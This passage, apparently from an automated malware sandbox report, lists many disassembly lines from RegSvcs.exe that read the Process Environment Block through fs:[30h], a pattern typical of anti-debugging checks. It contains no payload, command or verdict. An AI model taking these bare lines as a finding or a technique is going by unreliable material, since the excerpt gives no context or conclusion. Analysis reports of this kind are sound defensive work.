            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C460 mov ecx, dword ptr fs:[00000030h]6_2_0156C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC427 mov eax, dword ptr fs:[00000030h]6_2_014DC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E04E5 mov ecx, dword ptr fs:[00000030h]6_2_014E04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A49A mov eax, dword ptr fs:[00000030h]6_2_0159A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015144B0 mov ecx, dword ptr fs:[00000030h]6_2_015144B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E64AB mov eax, dword ptr fs:[00000030h]6_2_014E64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156A4B0 mov eax, dword ptr fs:[00000030h]6_2_0156A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522750 mov eax, dword ptr fs:[00000030h]6_2_01522750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522750 mov eax, dword ptr fs:[00000030h]6_2_01522750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01564755 mov eax, dword ptr fs:[00000030h]6_2_01564755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E75D mov eax, dword ptr fs:[00000030h]6_2_0156E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov esi, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov eax, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov eax, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0750 mov eax, dword ptr fs:[00000030h]6_2_014E0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8770 mov eax, dword ptr fs:[00000030h]6_2_014E8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01510710 mov eax, dword ptr fs:[00000030h]6_2_01510710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C700 mov eax, dword ptr fs:[00000030h]6_2_0151C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0710 mov eax, dword ptr fs:[00000030h]6_2_014E0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155C730 mov eax, dword ptr fs:[00000030h]6_2_0155C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov eax, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov ecx, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov eax, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C720 mov eax, dword ptr fs:[00000030h]6_2_0151C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C720 mov eax, dword ptr fs:[00000030h]6_2_0151C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EC7C0 mov eax, dword ptr fs:[00000030h]6_2_014EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015607C3 mov eax, dword ptr fs:[00000030h]6_2_015607C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E47FB mov eax, dword ptr fs:[00000030h]6_2_014E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E47FB mov eax, dword ptr fs:[00000030h]6_2_014E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E7E1 mov eax, dword ptr fs:[00000030h]6_2_0156E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158678E mov eax, dword ptr fs:[00000030h]6_2_0158678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E07AF mov eax, dword ptr fs:[00000030h]6_2_014E07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015947A0 mov eax, dword ptr fs:[00000030h]6_2_015947A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FC640 mov eax, dword ptr fs:[00000030h]6_2_014FC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01512674 mov eax, dword ptr fs:[00000030h]6_2_01512674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A660 mov eax, dword ptr fs:[00000030h]6_2_0151A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A660 mov eax, dword ptr fs:[00000030h]6_2_0151A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A866E mov eax, dword ptr fs:[00000030h]6_2_015A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A866E mov eax, dword ptr fs:[00000030h]6_2_015A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522619 mov eax, dword ptr fs:[00000030h]6_2_01522619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E609 mov eax, dword ptr fs:[00000030h]6_2_0155E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E262C mov eax, dword ptr fs:[00000030h]6_2_014E262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE627 mov eax, dword ptr fs:[00000030h]6_2_014FE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01516620 mov eax, dword ptr fs:[00000030h]6_2_01516620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518620 mov eax, dword ptr fs:[00000030h]6_2_01518620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015606F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015606F1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E4690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E4690 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015166B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01560946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01584978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01584978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156C97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0152096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0152096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0152096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156C912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014D8918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014D8918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155E908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0157892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015149D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015AA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015769C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015129F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015129F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156E9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E09AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E09AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015689B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015689B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015689B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01510854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014F2840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E4859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E4859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156E872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01576870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01576870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156C810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0158483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0158483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0150E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0151C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015AA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0156C89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0158EB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01594B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01594B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01576B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01576B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015AAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01588B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014DCB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0155EB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0150EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0150EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015A8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_015A8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_014E0BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0158EBD0 mov eax, dword ptr fs:[00000030h]
